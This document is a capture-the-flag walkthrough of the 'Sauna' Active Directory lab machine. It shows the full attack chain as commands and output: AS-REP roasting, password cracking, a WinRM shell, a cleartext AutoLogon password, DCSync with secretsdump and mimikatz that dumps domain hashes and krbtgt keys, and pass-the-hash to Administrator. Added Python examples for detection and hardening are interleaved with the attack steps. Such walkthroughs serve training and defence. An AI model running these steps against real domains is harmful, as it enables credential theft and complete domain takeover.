PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-01 15:02:21Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49668/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49725/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| smb2-time:
|   date: 2024-01-01T15:03:18
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
EGOTISTICAL-BANK.LOCAL
┌──(root㉿kali)-[~/Desktop/Sauna]
└─# GetNPUsers.py Egotistical-bank.local/ -dc-ip 10.10.10.175
Impacket v0.11.0 - Copyright 2023 Fortra

No entries found!
┌──(root㉿kali)-[~/Desktop/Sauna]
└─# ldapsearch -x -H ldap://10.10.10.175 -b "dc=Egotistical-bank,dc=local"

# Hugo Smith, EGOTISTICAL-BANK.LOCAL
dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
name.txt:
Hsmith
HSmith
HugoSmith
HugoS
Hugo
Hugos
Hugo

./kerbrute_linux_amd64 userenum -d EGOTISTICAL-BANK.LOCAL --dc EGOTISTICAL-BANK.LOCAL ../Sauna/name.txt
2024/01/01 18:26:44 >  [+] VALID USERNAME:       HSmith@EGOTISTICAL-BANK.LOCAL

name.txt (second list):
FergusSmith
FergusS
FSmith
ChaunCoins
CCoins
ChaunC
HugoBear
HBear
HugoB
BowieTaylor
BTaylor
BowieT
SophieDriver
SophieD
SDriver
StevenKerb
SKerb
StevenK
ShaunCoins
SCoins
ShaunC

../Tool/kerbrute_linux_amd64 userenum --dc EGOTISTICAL-BANK.LOCAL -d EGOTISTICAL-BANK.LOCAL ./name.txt
2024/01/01 19:00:35 >  [+] VALID USERNAME:       FSmith@EGOTISTICAL-BANK.LOCAL
Get a TGT (AS-REP) for fsmith with GetNPUsers.py:
┌──(root㉿kali)-[~/Desktop/Sauna]
└─# GetNPUsers.py Egotistical-bank.local/fsmith -dc-ip 10.10.10.175 -request -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for fsmith
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:5e0e4ea398a0894d71ca76e0c72b07d3$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
hashcat -m 18200 ./tgt.txt /usr/share/wordlists/rockyou.txt
Cracked password: Thestrokes23
evil-winrm -u fsmith -p 'Thestrokes23' -i EGOTISTICAL-BANK.LOCAL
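The AS-REP roast above works because the fsmith account has "Do not require Kerberos preauthentication" set, so the KDC hands out an AS-REP (with a portion encrypted under the user's password-derived key) to anyone who asks for it; hashcat mode 18200 then attacks that portion offline. The Python below is an added example written for this page, not Impacket's or the writeup's own code. It shows the two defender-side checks that match this step: flagging accounts whose userAccountControl carries the DONT_REQ_PREAUTH bit (0x400000), and scanning Domain Controller Security-log 4768 events for the roasting signature, Pre-Authentication Type 0 combined with RC4 (etype 0x17) ticket encryption. The account list and the key=value event records are constructed samples in a simplified layout, not real DC logs, and the client address is made up.

```python
import re

# userAccountControl bit ADS_UF_DONT_REQUIRE_PREAUTH ("Do not require Kerberos preauthentication")
DONT_REQ_PREAUTH = 0x400000
# Kerberos etype 23 (rc4-hmac) as it appears in the 4768 "Ticket Encryption Type" field
RC4_HMAC = 0x17


def preauth_disabled_accounts(accounts):
    """accounts maps sAMAccountName -> userAccountControl (int), e.g. from an LDAP export.
    Returns the sorted names whose UAC carries DONT_REQ_PREAUTH; each one is roastable."""
    return sorted(name for name, uac in accounts.items() if uac & DONT_REQ_PREAUTH)


def parse_event(line):
    """Parse one constructed 'key=value key=value' log record into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def asrep_roast_candidates(lines):
    """Return (account, client) pairs for 4768 events that show the roasting signature:
    Pre-Authentication Type 0 (the AS-REP was issued without pre-auth) and RC4 encryption,
    which is what GetNPUsers.py requests so that the hash is cheap to crack."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4768":
            continue
        etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
        if ev.get("PreAuthType") == "0" and etype == RC4_HMAC:
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits


# Constructed sample data.  UAC bits: 0x200 NORMAL_ACCOUNT, 0x10000 DONT_EXPIRE_PASSWD.
SAMPLE_ACCOUNTS = {
    "HSmith": 0x10200,
    "FSmith": 0x410200,  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
    "svc_loanmgr": 0x10200,
}
# Constructed 4768/4769 records (simplified); 10.10.14.5 is a made-up client address.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=HSmith PreAuthType=2 TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.5",
    "EventID=4768 TargetUserName=FSmith PreAuthType=0 TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5",
    "EventID=4769 TargetUserName=FSmith PreAuthType=2 TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.5",
]

if __name__ == "__main__":
    print("pre-auth disabled:", preauth_disabled_accounts(SAMPLE_ACCOUNTS))
    print("AS-REP roast candidates:", asrep_roast_candidates(SAMPLE_EVENTS))
```

The first function is the periodic hygiene check to run against a directory export (the fix is to clear the flag on every account that does not genuinely need it); the second is the rule to feed a SIEM, keyed on the combination rather than on Pre-Authentication Type 0 alone, since a few legitimate non-Windows clients also skip pre-auth but will not normally ask for RC4.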
*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            FSmith                   Guest
HSmith                   krbtgt                   svc_loanmgr

*Evil-WinRM* PS C:\Users\FSmith\Desktop> net user fsmith /domain
User name                    FSmith
Full Name                    Fergus Smith
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/23/2020 8:45:19 AM
Password expires             Never
Password changeable          1/24/2020 8:45:19 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/1/2024 11:10:04 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.
Result of Winpeas.exe:
Looking for AutoLogon credentials
Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
reg.exe query "HKLM\software\microsoft\windows nt\currentversion\winlogon"
evil-winrm -u svc_loanmgr -p 'Moneymakestheworldgoround!' -i 10.10.10.175
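What WinPEAS and the reg query turned up is a cleartext AutoLogon password in the Winlogon key, which any authenticated user on the host can read. The Python below is an added example, not code from the writeup or from WinPEAS: it parses reg.exe query output into a value map, reports the AutoLogon exposure, and masks the secret for a report. The sample output is constructed with a placeholder password and a made-up domain; the parser assumes the usual reg.exe layout of name, type and data separated by runs of spaces.

```python
import re

# One value line of "reg.exe query" output: indented name, REG_* type, then the data.
REG_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*)$")


def parse_reg_query(text):
    """Parse 'reg.exe query <key>' output into {value_name: (reg_type, data)}.
    The key-path line itself is not indented and is skipped."""
    values = {}
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            name, reg_type, data = m.groups()
            values[name] = (reg_type, data.strip())
    return values


def autologon_findings(values):
    """Return a list of findings about the Winlogon values, most severe first.
    A cleartext DefaultPassword is the finding; the supported alternative stores the
    password as an LSA secret instead of in this world-readable key."""
    findings = []
    pw = values.get("DefaultPassword")
    auto = values.get("AutoAdminLogon", (None, "0"))[1]
    if pw is not None:
        user = values.get("DefaultUserName", (None, "<unknown>"))[1]
        findings.append(f"DefaultPassword is stored in cleartext for {user} (readable by any local user)")
        if auto == "1":
            findings.append("AutoAdminLogon=1: the host logs this account on automatically at boot")
    elif auto == "1":
        findings.append("AutoAdminLogon=1 without DefaultPassword: the password is presumably held as an LSA secret")
    return findings


def redact(values):
    """Copy of the value map with DefaultPassword masked, for inclusion in a report."""
    out = dict(values)
    if "DefaultPassword" in out:
        out["DefaultPassword"] = (out["DefaultPassword"][0], "********")
    return out


# Constructed sample of reg.exe output; EXAMPLEBANK and the password are placeholders.
SAMPLE_OUTPUT = """
HKEY_LOCAL_MACHINE\\software\\microsoft\\windows nt\\currentversion\\winlogon
    AutoAdminLogon    REG_SZ    1
    DefaultDomainName    REG_SZ    EXAMPLEBANK
    DefaultUserName    REG_SZ    EXAMPLEBANK\\svc_example
    DefaultPassword    REG_SZ    Placeholder-Not-A-Real-Password
    ReportBootOk    REG_SZ    1
"""

if __name__ == "__main__":
    vals = parse_reg_query(SAMPLE_OUTPUT)
    for finding in autologon_findings(vals):
        print("[!]", finding)
    print(redact(vals))
```

Run against the real output of the reg.exe query shown above, the same parser applies unchanged; the remediation is to delete the DefaultPassword value (and reconsider whether the host needs AutoLogon at all), then rotate the exposed account's password.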
Use SharpHound.exe to collect AD information for BloodHound.
secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
┌──(root㉿kali)-[~/Desktop/Sauna]
└─# secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@EGOTISTICAL-BANK.local'
Impacket v0.11.0 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:838e81ccfe72b6f52512c56f56935bdd:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:b748b00c8436e96524b0cd3abf39df21438107098df0c5d4d811f81f8987b95e
SAUNA$:aes128-cts-hmac-sha1-96:5a1b125d898779090e63a8787e47db42
SAUNA$:des-cbc-md5:a8fe68736d8f2aba
[*] Cleaning up...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175
Another way:
Upload mimikatz to the Windows host.
.\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit
*Evil-WinRM* PS C:\Users\svc_loanmgr\Desktop> .\mimikatz 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator
[DC] 'EGOTISTICAL-BANK.LOCAL' will be the domain
[DC] 'SAUNA.EGOTISTICAL-BANK.LOCAL' will be the DC server
[DC] 'administrator' will be the user account
[rpc] Service  : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 7/26/2021 8:16:16 AM
Object Security ID   : S-1-5-21-2966785786-3096785034-1186376766-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 0: 823452073d75b9d1cf70ebdf86c7f98e
    ntlm- 1: d9485863c1e9e05851aa40cbb4ab9dff
    ntlm- 2: 7facdc498ed1680c4fd1448319a8c04f
    lm  - 0: 365ca60e4aba3e9a71d78a3912caf35c
    lm  - 1: 7af65ae5e7103761ae828523c7713031

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 716dbadeed0e537580d5f8fb28780d44

* Primary:Kerberos-Newer-Keys *
    Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
      aes128_hmac       (4096) : a9f3769c592a8a231c3c972c4050be4e
      des_cbc_md5       (4096) : fb8f321c64cea87f
    OldCredentials
      aes256_hmac       (4096) : 987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
      aes128_hmac       (4096) : 145e4d0e4a6600b7ec0ece74997651d0
      des_cbc_md5       (4096) : 19d5f15d689b1ce5
    OlderCredentials
      aes256_hmac       (4096) : 9637f48fa06f6eea485d26cd297076c5507877df32e4a47497f360106b3c95ef
      aes128_hmac       (4096) : 52c02b864f61f427d6ed0b22639849df
      des_cbc_md5       (4096) : d9379d13f7c15d1c

* Primary:Kerberos *
    Default Salt : EGOTISTICAL-BANK.LOCALAdministrator
    Credentials
      des_cbc_md5       : fb8f321c64cea87f
    OldCredentials
      des_cbc_md5       : 19d5f15d689b1ce5

* Packages *
    NTLM-Strong-NTOWF

* Primary:WDigest *
    01  b4a06d28f92506a3a336d97a66b310fa
    02  71efaf133c578bd7428bd2e1eca5a044
    03  974acf4f67e4f609eb032fd9a72e8714
    04  b4a06d28f92506a3a336d97a66b310fa
    05  79ba561a664d78d6242748774e8475c5
    06  f1188d8ed0ca1998ae828a60a8c6ac29
    07  801ddc727db9fa3de98993d88a9ffa8b
    08  a779e05da837dd2d303973304869ec0f
    09  ac2c01846aebce4cbd4e3ec69b47a65d
    10  6d863d6ae06c3addc49b7a453afe6fa0
    11  a779e05da837dd2d303973304869ec0f
    12  6676b9fdd4aa7f298f1ada64c044c230
    13  5a01167d750636d66e5602db9aece9b7
    14  f702282bd343c2fee7b98deac8950390
    15  a099aa3c81f1affeba59d79a6533f60d
    16  4bae84b8f0b0306788ff9bda4acb3bd4
    17  976d547fb9e04b0ac5ec60508c275da1
    18  50c302b71d0e08a1a2be14b56225645f
    19  edb19e08653443695f6d3599e0a6bddf
    20  c497465ddc6e2fc14cb0359d0d5de7f8
    21  2ed0b4b57196fb190a66224b2b17029f
    22  37d03051ae1cd6046975948564ab01fa
    23  d4c7554fe1beb0ed712f50cfec470471
    24  8df495fe69cdce409b9f04ea04289b9e
    25  40788044be982310920cc0740687fefd
    26  db7f66f1f1a8f46274d20cfdda5b6e1c
    27  d70226ec52f1ef198c2e1e955a1da9b6
    28  abdd681f875a9b3f3a50b36e51692a2c
    29  dcd140a2ce2bf70fed7ac0e2b60d0dee

mimikatz(commandline) # exit
Hash NTLM: 823452073d75b9d1cf70ebdf86c7f98e
evil-winrm -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e' -i 10.10.10.175
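Both escalation paths above, secretsdump.py's DRSUAPI method and mimikatz lsadump::dcsync, are the same operation: the svc_loanmgr account asks the DC to replicate directory secrets, which only works because that account holds the replication control-access rights on the domain object. The Python below is an added example written for this page, not Impacket or mimikatz code. It covers the two defender-side controls for this step: alerting on Security-log 4662 events (emitted when directory service access auditing is enabled) in which a principal other than a domain controller computer account exercised a DS-Replication right, and reviewing the domain object's ACL for trustees that hold those rights but should not. The extended-right GUIDs are the real AD schema values; the event records and ACEs are constructed samples in a simplified layout, and SAUNA$ is assumed here to be the only DC account.

```python
import re

# Control-access rights a replication consumer exercises on the domain naming context
# (extended-right GUIDs from the AD schema).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


def parse_event(line):
    """Parse one constructed 'key=value key=value' log record into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def dcsync_alerts(lines, replication_accounts):
    """Scan 4662 records and return (subject, [right names]) for every principal outside
    replication_accounts (the DC computer accounts) that used a replication right.
    Get-Changes-All is the one that yields password hashes, so a hit on it is the strongest."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4662":
            continue
        guids = GUID_RE.findall(ev.get("Properties", "").lower())
        rights = [REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS]
        if rights and ev["SubjectUserName"] not in replication_accounts:
            alerts.append((ev["SubjectUserName"], rights))
    return alerts


def unexpected_replication_aces(aces, expected_trustees):
    """aces: (trustee, object_type_guid) tuples read from the domain object's DACL.
    Returns the sorted trustees that hold a replication right without being expected to;
    removing those ACEs is the fix that closes this path."""
    return sorted({t for t, g in aces if g.lower() in REPL_RIGHTS and t not in expected_trustees})


# Constructed 4662 records (simplified). The last one reads a user object, not a replication right.
SAMPLE_4662 = [
    "EventID=4662 SubjectUserName=SAUNA$ ObjectType=domainDNS Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=svc_loanmgr ObjectType=domainDNS "
    "Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662 SubjectUserName=svc_loanmgr ObjectType=user Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
]
# Constructed ACEs on the domain object; the expected set is an assumption for this sample.
SAMPLE_ACES = [
    ("EGOTISTICALBANK\\Domain Controllers", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    ("BUILTIN\\Administrators", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
    ("EGOTISTICALBANK\\svc_loanmgr", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
    ("EGOTISTICALBANK\\svc_loanmgr", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"),
]
EXPECTED_TRUSTEES = {"EGOTISTICALBANK\\Domain Controllers", "BUILTIN\\Administrators"}

if __name__ == "__main__":
    print("DCSync alerts:", dcsync_alerts(SAMPLE_4662, {"SAUNA$"}))
    print("unexpected replication ACEs:", unexpected_replication_aces(SAMPLE_ACES, EXPECTED_TRUSTEES))
```

The 4662 rule is the detection; the ACL review is the prevention, and it is also the check that would have shown svc_loanmgr as an over-privileged service account before anyone used it. Once replication of the Administrator hash has happened, as it did here, rotating that account's password (and, because krbtgt was dumped too, the krbtgt password twice) is part of the response.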